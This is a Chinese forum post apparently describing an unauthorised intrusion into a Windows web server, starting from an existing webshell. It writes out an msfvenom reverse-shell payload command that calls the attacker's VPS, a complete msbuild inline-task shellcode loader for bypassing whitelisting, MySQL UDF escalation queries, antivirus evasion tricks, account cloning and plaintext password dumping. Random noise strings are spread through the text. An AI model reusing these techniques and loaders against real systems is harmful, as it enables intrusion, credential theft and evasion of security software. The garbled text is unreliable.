0x00 前言 3 b" N2 ?& U; Y2 l9 g( V$ f
平常自己挺喜欢折腾的,有时候遇到一个好的突破点会折腾它个几天几夜,刚刚忙完护网,正准备修整几天,突然有人朋友联系我说有个任务需要搞进去,问我能行不能行,后来得知是已经拿到webshell了,通过一番努力便有了下文。
$ O8 H8 {3 N' b0 F' {. X) x5 |0 C( N; U; U% h/ D" @' z! E/ r% q7 H 0x01 前期的信息刺探** 5 y+ c V# F$ h$ Q9 m, `' Q* b
4 k5 u! Y& h; v7 l首先拿到webshell,发现phpshell只能访问shell所在目录,连网站根目录都跨不过去如图:
5 m# T3 p! w& L( m) g! E: i2 Y! i& T/ K4 ^8 |/ N

c盘d盘根目录就更别提跨过去了,随之执行一下命令看看,如图: 0 O( ~+ f: l9 H2 T" j) z+ a" f
& m3 A; P! I, g- W! ?- i$ f# N
* o" I, R: O' b# U9 q0 v
2 T/ _8 ]" {& K whoami等简单的命令可以跑起来,tasklist发现了 某某安全套装等安全防护进程进程,om my god,刺激,就喜欢这种各种需要绕的环境,既然能跑起命令来那就上免杀的exp来试着提一下(通过rar解压方法突破某防护程序上传),如图: / Z- ~: y e( o8 r) A4 T( F# c
4 b% H# l, B3 J4 j# f

* f0 ~7 L; T$ ]% G0 Q% h% Y
经过测试发现,不管把exp放哪个目录都提示拒绝访问,特别是net命令都禁止执行,越发让我感觉是安装安全防护程序的缘故; ' Y% }& u0 k5 c9 h9 u$ K8 K/ L
7 h; ?# Q4 Q! Y& J. C 0x02 深入
通过msbuild.exe白名单方式运行metasploit payload绕过某安全程序调出w3wp.exe进程
在webshell执行直接执行rar程序一直提示拒绝访问如图: ! U( C' O+ s9 \- X# N+ f# [% g- h

2 h9 U7 n7 W" Z# S3 l& p7 j3 z0 T
在实际做测试的时候发现windows下用shell反弹个cmdshell回来执行一些命令要比在webshell好许多,看官请看 7 j7 x( H& r; e/ l4 F$ K
3 u0 {/ c* A: t9 s d* x# J

+ e5 j- K* J" r
成功将我们想要的exe程序解压到指定目录,webshell下是没法cd到rar目录的,现在能正常上传exe,我们看能不能想办法让咱们的msf不要闲下来,之前考虑用 php/meterpreter/reverse_tcp这个payload上线弹回meterpreter,但是弹回来什么权限也没,连ps进程命令都没法显示,这时候就想到了使用msbuild.exe白名单方式运行metasploit payload绕过某防护程序让msf上线,于是就开始动手,具体如下:
; G: L, D2 Z \3 n
首先使用msf生成一个c#的payload $ K! F9 p3 k% z: l
msfvenom -p windows/meterpreter/reverse_tcp lhost=vpsip lport=443 -f csharp
代码如下: + o* h9 ~! x7 p0 p8 r" V
( S5 G6 y% W/ V, S+ T byte[] buf = new byte[179779] { ; u* ?- {* R2 E" a
$ Q; m+ `4 d3 t' A
. z- [9 q1 y9 I0x8b,0x71,0x1c,0x85,0xf6,0x74,0x58,0x33,0xff,0x39,0x79,0x20,0x74,0x51,0x39,
, Q5 t# a9 |& A# D4 _- z+ t. b5 v! s! X 0x79,0x24,0x74,0x4c,0x89,0x79,0x14,0x89,0x79,0x08,0x89,0x79,0x18,0xc7,0x41,
4 w* J1 ~- J8 C0 K1 G* z: D2 P$ o( r: X 0x2c,0x02,0x00,0x00,0x00,0x8b,0x46,0x08,0x89,0x7e,0x14,0x89,0x46,0x10,0x39,
7 l! e; Z# y1 i/ w C0x7e,0x18,0x7d,0x03,0x89,0x7e,0x18,0x39,0x7e,0x18,0x6a,0x2a,0x58,0x6a,0x71,
8 `# {+ F' J2 k; P1 l+ r6 u: K0 \0x5a,0x0f,0x45,0xc2,0x89,0x46,0x04,0xc7,0x41,0x30,0x01,0x00,0x00,0x00,0x56,
) \* e$ ?5 a7 y: R3 ~* [2 B0x89,0x7e,0x20,0xe8,0x88,0x07,0x00,0x00,0x56,0xe8,0x8a,0x15,0x00,0x00,0x59,
0x59,0x33,0xc0,0xeb,0x03,0x6a,0xfe,0x58,0x5f,0x5e,0x5d,0xc3,0x55,0x8b,0xec, 2 n! [4 j$ R+ N a. `
0x8b,0x4d,0x08,0x33,0xd2,0x56,0x57,0x85,0xc9,0x0f,0x84,0x8d,0x00,0x00,0x00,
* r1 I R( ^" S- o) ]+ f g0x8b,0x71,0x1c,0x85,0xf6,0x0f,0x84,0x82,0x00,0x00,0x00,0x8b,0x7d,0x0c,0x83,
3 Z8 X9 u4 U# I7 j3 D- C0xff,0xff,0x6a,0x06,0x58,0x0f,0x44,0xf8,0x83,0xff,0x09,0x77,0x71,0x83,0x7d, 6 R$ ` d: V# ?8 l7 D, R
4 b8 d$ a, U- m# c/ Q 0x10,0x02,0x77,0x6b,0x6b,0x46,0x7c,0x0c,0x53,0x6b,0xdf,0x0c,0x8b,0x80,0x00,
/ M+ v, K V+ Y: G e& G- A$ g5 w2 Y V; A a* Z% j 0x9d,0x02,0x10,0x3b,0x83,0x00,0x9d,0x02,0x10,0x74,0x11,0x39,0x51,0x08,0x74, * E7 T" V# O0 [! Y
0x0c,0x6a,0x01,0x51,0xe8,0x2b,0xf6,0xff,0xff,0x59,0x59,0x8b,0xd0,0x39,0x7e,
0x7c,0x74,0x31。。。代码太长省略。。。
; @2 g7 U- O# p+ ~2 W$ r0 `1 a5 p% R2 z$ w9 F, _5 p9 e };
' p+ P( S# w$ }8 s4 M. S- N: v. O - Z2 e; Y! s$ k5 w% m. _+ B
0 Q: K: t/ H, R' [7 \ EUInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, - U) b/ ~! q& {# _
1 g+ _+ l* ~4 w: @/ i3 z9 j% [8 P' T n MEM_COMMIT, PAGE_EXECUTE_READWRITE); * o+ N4 i* A) q6 y7 b
7 @, V9 [6 Y, b" l: b+ G+ c' ^& {- u' d Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
4 t+ e: J1 ]4 X% I1 ^& lIntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
+ l: G5 B u- f. A- z8 { IntPtr pinfo = IntPtr.Zero;
- i8 b/ m/ e/ a* RhThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); " L. ~) a9 F# ]9 n
WaitForSingleObject(hThread, 0xFFFFFFFF); & M y4 `) M: U. w% e# }
return true; & ^6 K. A# f4 \& A
/ a% [- L, I8 E8 O* S8 m }
% p5 |" T, E8 Z7 p- c! _( j7 p5 S% i! m; F" G$ t } 1 d$ d; @/ d- A( l5 e5 O# Z
/ ~( Q/ ?2 W8 i9 c4 r7 e3 ] ]]>
4 i, f' S9 _# M, f+ w/ m/ u</Code>
, t- c4 E$ U# n4 s V, E8 W/ ]0 y: J </Task> ; W) h5 I7 e$ F) O( g" l
; _8 q: u L5 \3 d: X; U& s* ` </UsingTask> 9 B, z) E# A4 k3 L, ]& _: }
# i; \3 B& ~$ e3 \</Project> ' a- Q p& ~; T( S; S
6 v; R& x1 t/ O 用msf生产的代码替换原始代码的内容,这是原始payload如下: $ G, [! n' _! {7 H. y8 t3 M
9 I& ~8 A I6 n6 r1 l/ z4 F<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
5 p! J0 `5 m9 _ d/ B. v& U0 Q _5 p0 i& c5 u <!-- This inline task executes shellcode. -->
5 N# a0 @! U! Q) C <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> % W+ ~* U; S: ~* P
" c7 ^( ^1 L6 L A1 _8 ^, B" `$ P3 R) \ <!-- Save This File And Execute The Above Command --> ! J* S& g8 p9 S% G
<!-- Author: Casey Smith, Twitter: @subTee -->
6 z6 |5 v3 v; c4 E6 I& n1 ^* [/ e& e<!-- License: BSD 3-Clause -->
$ J$ M! v' j+ _' b6 O<Target Name="Hello">
<ClassExample />
& {; g' Z' S$ E$ k5 `, r+ b5 J7 r' M </Target> * {0 Y: D5 _& o" [- n1 X: ]
- O }8 u+ l% `* D: ^3 ~. n5 w9 p0 g4 m4 A <UsingTask 5 r0 a k6 T' x- m
0 t# d# ^+ ]) k e$ j z- ?TaskName="ClassExample" 5 ~7 x/ C' l- q; x6 h9 N+ x' G
TaskFactory="CodeTaskFactory" 6 [3 l5 I6 F, P% \
' R' q7 G3 Z, A2 f AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
8 l( A# g }& w$ W" C<Task>
; \6 }5 R3 l1 X- d7 O* i7 D/ ?2 V/ O0 ^8 J+ B& J% J
$ D1 x/ A2 m& h7 l0 I, g, v- F, H<Code Type="Class" Language="cs"> % Z) [7 \* q9 M5 d* l1 G
) ^- c0 G( ], ^<![CDATA[
" \& U# j1 m% M+ L5 q+ ^' Q T+ O2 p% O! x) _. u using System;
, V+ h" X6 G# E$ K& |) Z; L7 f& Z3 ^; I! V4 }* Y using System.Runtime.InteropServices; 0 R( b4 Q, V$ {' ]/ t/ m
2 Z2 J" x: l- `! _using Microsoft.Build.Framework;
/ h+ t& u1 w/ W4 \: [% w: Eusing Microsoft.Build.Utilities; ! ]5 M+ Q, @" n4 A \5 r
" h* S9 H7 b4 x' r* G, m* C2 l" n: t) Qpublic class ClassExample : Task, ITask
{ ! s. v) {5 j+ m% x
6 B: V' C8 D" B! U; v" T, V( F" e private static UInt32 MEM_COMMIT = 0x1000; 4 M! H2 x; T" Y1 g3 ^
( l7 i: A# x$ e/ m/ {/ s% m! N& b0 A* ` private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")] 4 e- ^7 J# @3 w6 S) n' V
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, ' y2 U8 k: C' [+ w W/ X
/ p# ^* e( Z3 I1 j/ o4 \ UInt32 size, UInt32 flAllocationType, UInt32 flProtect); ' z ]$ r/ h0 ^1 L
5 G# s7 T( b( N% y3 W L7 L. a, J1 l2 J [DllImport("kernel32")] , C- i3 }5 c& c5 `
1 x8 R6 G, D3 P8 m, p: \! l$ p% c! P: c private static extern IntPtr CreateThread( $ e! t$ R- Q4 A' @! S6 v
D H$ u3 ]* n1 F# U7 E* L \7 r$ ?UInt32 lpThreadAttributes,
) }! y& L5 p: Y( XUInt32 dwStackSize,
+ I. i, B4 F; H UInt32 lpStartAddress, / X: @0 I) `# W5 t- q* i5 u, M# D
8 V. K9 H0 { M4 B/ ?2 m% m IntPtr param,
UInt32 dwCreationFlags,
9 ~4 Z1 l) \2 V* w$ J0 tL2 z' E+ V' k) j( g/ j ref UInt32 lpThreadId * d F8 c8 b! {7 \
* w- M0 H1 d5 N, l: z8 q9 v); 6 E# q% c; P2 I: L5 W
" _: m# I. F; }" d4 B& g& _. c[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
" ^; U, C$ |0 w, B; L3 ^ IntPtr hHandle, + B' U9 o! p. I" ?$ s* A
5 g% V+ q1 U7 ?. C: J, q6 Q3 dUInt32 dwMilliseconds ' l" v a. m' {
. M: m c% |( H# y );
public override bool Execute() 1 a) }6 v3 a+ k' y z
0 J1 X: S" Z( k" L, s. a( ?2 o3 ]* {: F$ Y; M! I { ! s+ d2 Z a$ D/ x( l* E7 S j9 c8 U
0 S8 V/ B" F; |. [! p$ X8 f. t- } byte[] shellcode = new byte[179779] {
* M4 R3 V& O1 x- B `8 y; u/ H* Q) b7 O1 u 这里是msf生成的c# shellcode,代码太长省略 + l; M' }3 G% b1 C; M. |
9 S' g3 S4 }$ t4 C+ z: {$ M9 `}; ; o+ Q }" Y6 G6 H c' N7 x
6 ^5 O; G7 }# B" O. Z3 z# t0 y$ W3 E4 @* _) f UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); $ i1 ?5 {& Y- D* N8 Y5 Y
4 n( X( o: O8 `" t0 T. H* {3 _1 L, p3 k+ @# a IntPtr hThread = IntPtr.Zero;
7 q' w# D5 i6 IUInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
0 P% o1 N4 k3 ?/ s* u4 N: a- Z/ K7 T WaitForSingleObject(hThread, 0xFFFFFFFF);
@) w7 X2 z( l- |7 H; ]: Y7 \3 G* u return true;
4 K3 l, J. @2 I' s8 a: _+ i}
} [% y+ X ]" {7 A1 Q4 g$ V
]]> 8 [& B& p. q- D6 J: d% ~
</Code>
1 @# j0 A3 O' {1 {7 ]0 x$ L1 a" c; U</Task>
4 S8 T% a& J. S3 w</UsingTask>
{. `, K0 x, Z& `, J4 [ </Project> * |! X. T& ]5 S) q9 h) @* [
4 z! W, k z# ]2 @! X! H1 [, W! _/ S1 ^5 b
需要注意的是必须改成shellcode如图:
$ Y% x4 R' K* Y& {

然后上传到web目录,nc反弹继续执行如下命令: 1 p* ?! D2 G, V1 J; M! S$ y$ B
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
- o1 Y% _+ @0 K+ y0 v3 v9 Y- [/ T6 r8 K4 j6 S msbuild.exe D:\1\1111.com\uploadfile\19200\443.csproj 0 a& ?! d" E! l( q7 `) _
4 n1 n2 [: G6 l- _$ L
这时候监听好的msf就会返回一个meterpreter如图:

试着在shell和meterpreter下执行exp都提示拒绝访问,如图:
5 y( e- f: x& k0 @- c) p

但是测试upload上传命令确实是成功调出w3wp.exe 进程,经过一番努力无果,只好换思路解决。 $ [' e+ [# V& G0 }! F$ F( R- A
0x03 MySQL udf提权
通过上面的一些测试,已经无望了,这时候就想着用其他办法,经过测试发现网站支持asp,就上传了一个aspshell,各种翻目录各种测试,终于在网站的二级目录数据库配置文件发现了mysql root密码,OK,上传udf提权php马,在具体测试过程中发现,市面上的udf Php工具都被某安全程序被杀了,我发现把被杀的php后缀修改为csproj上传不杀了,要不然无论把被杀的php换成什么后缀名都不行,然后再通过PHP包含这个文件,就可以突破了(也不知道算不算是个某防护程序的一个bug,总之用这种办法让udf工具跑起来了),如图:
. c; H2 T! w4 s l' _5 V( g: z) D5 p9 o6 C9 Q: l) Y+ k

0 | x; ?+ \7 N6 h1 R7 f
然后按常规导入dll,提示dll导入成功,创建sys_eval 函数执行命令,却又提示函数不存在如:FUNCTION mysql.sys_eval does not exist,在测试过程没少折腾,用portfwd命令转发目标3306到本地,利用sqlmap -d 上传dll提示不成功,后来用--file-write命令上传dll到system32下也失败了,但是发现上传非二进制的文件的话是成功的,后来通过查看权限证明不是权限问题如图:
6 Y9 k4 w6 Z& ^6 r( j
select * from mysql.user where user = substring_index(user(), '@', 1) ; R2 G: N2 V2 R! _

权限都很OK,很悲催dll被禁止上传,可恶的安全防护呀,通过查询发现几个自定义函数,如图:

8 k9 q f/ H* Q. x) A
发现udf.dll已经被占坑了,我们查询一下看看
select hex(load_file('c:/windows/system32/udf.dll'));如图: * G; S0 r6 L) c

; \' R, V n" E
我们利用php环境把它转成dll,代码如下: O s) z0 m& i
9 N, e! |: U0 G <?php 4 L! Z* J4 R% ?4 t) Y
E1 @5 C" g( D0 C0 m0 q5 y0 t$ H; ? echo file_put_contents('udf.dll',hex2bin("这里为sql查询出来的值")); - S0 l0 h6 v+ Y; n& V3 @; H, {, K9 o G
/ p% N1 l9 ^: |! I( S ?> ) M/ w& @3 G* N
) I p/ p- B7 U# ^7 R8 g8 [! \3 ]1 ~ 成功把它还原成dll文件,用c32am打开看一下他的用法如图:
- d7 T J: w0 i, q0 n a3 g6 V7 V" [$ v" H) }; p* e- ~

看看这个shell函数的用法, * I6 q: X+ W7 M' t

正好和dll里面的信息一致,但是在测试的过程中发现cmd那个参数用法没法执行命令会卡死,后来试了exec,select shell('exec','whoami');,如图:

4 H5 V+ P8 ` z1 V4 J# a
说明这个exec可以绕过安全防护执行命令,接下来的测试中打算使用msf来操作,于是给目录上传了个免杀的msf工具,过全世界所有的杀毒用法 msf vpsip 443,但是监听好的msf一直没返回来meterpreter,后来没办法又用白名单执行命令成功上线(奇怪的还在后面)命令如下:select shell('exec','C:/Windows/Microsoft.NET/Framework/v4.0.30319/msbuild.exe D://1//xxoo.com//uploadfile//19200//443.csproj');注意斜杠问题否则执行出错

. I, D6 L* G& {9 `
但是奇怪的是已经成了system权限却没办法shell,这也正是这个目标奇葩的地方,执行shell卡死,后来ps了一下进程发现administrator的进程migrate pid,然后再执行shell成功执行,并且也可以执行net user 等命令如图: : T5 h: S! ]9 Z1 ?8 z! G
很OK,直接net user添加账号肯定不行,利用userclone克隆添加账号密码,账号添加成功,但是加入到管理员组失败,手里有杀某防护程序的神器,但是似乎用不上,杀完需要重启动静太大,OK,这时候发现administrator在线直接上传getpassword64免杀版抓明文密码,得到administrator的明文密码,试着用msf模块抓一下密码,如下:

没有成功,因为之前也踩点发现3389没有被某防护程序加入主机名或者ip认证,可以正常登录,所以也不涉及绕过认证登录的问题。登录如图: . H& ]& w$ [; r& B# z2 d7 `2 G
% l$ F h! L4 L7 N- I+ q
2 r8 ^: o# b9 R }/ A" B
渗透到此就结束了。
3 h9 H8 B! t" E 0x04另一个案例绕做组策略限制执行命令
3 w- f- O" T; s6 P- x, e主要还是白名单绕过执行程序及配合udf提权,碰到前人留下的udf后门直接提到system,剩下就是一顿乱折腾,不过也不白折腾,摸着石头过河没什么不好;第一次在先知改版后写文章,文章排版之类的还是不太熟悉,可能写的不尽人意,还是请多包涵。。。。。这里要感谢先知V师傅,莫须有等好兄弟的大力支持,一晚上陪我熬夜。。。 3 d! B" [% h- t% c2 ?, l7 {! k
; D8 Q$ U O' T+ S) ~
# D8 ?. U! H3 y* S9 |- ]% A5 s
. Q! N# s! K7 N) n( \+ L1 _1 u 命令跑起来了,最起码遇到不能执行命令的时候用白名单执行可以继续开展下一步工作,或者利用msf的load powershell也行继续搞,哈哈
4 l/ h6 B Z/ N, i9 x
黑客是一种精神,虽然我不是黑客,但是我崇拜这种精神,什么精神?就是永不言败,勇于突破,敢于挑战,崇尚自由的这种精神或者神经,值得各行各业的人学习。(自从学了黑客,人也变得踏实了,也不虚上跳下,也不让家里人觉得这个人不成熟、不靠谱,总之学黑客,得永生,黑客大法好!!!加油兄弟们!)
! |1 f- H+ X: j$ K# T5 KC6 X8 i; h% i i" z 4 H6 \3 T- j+ w; P. m
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |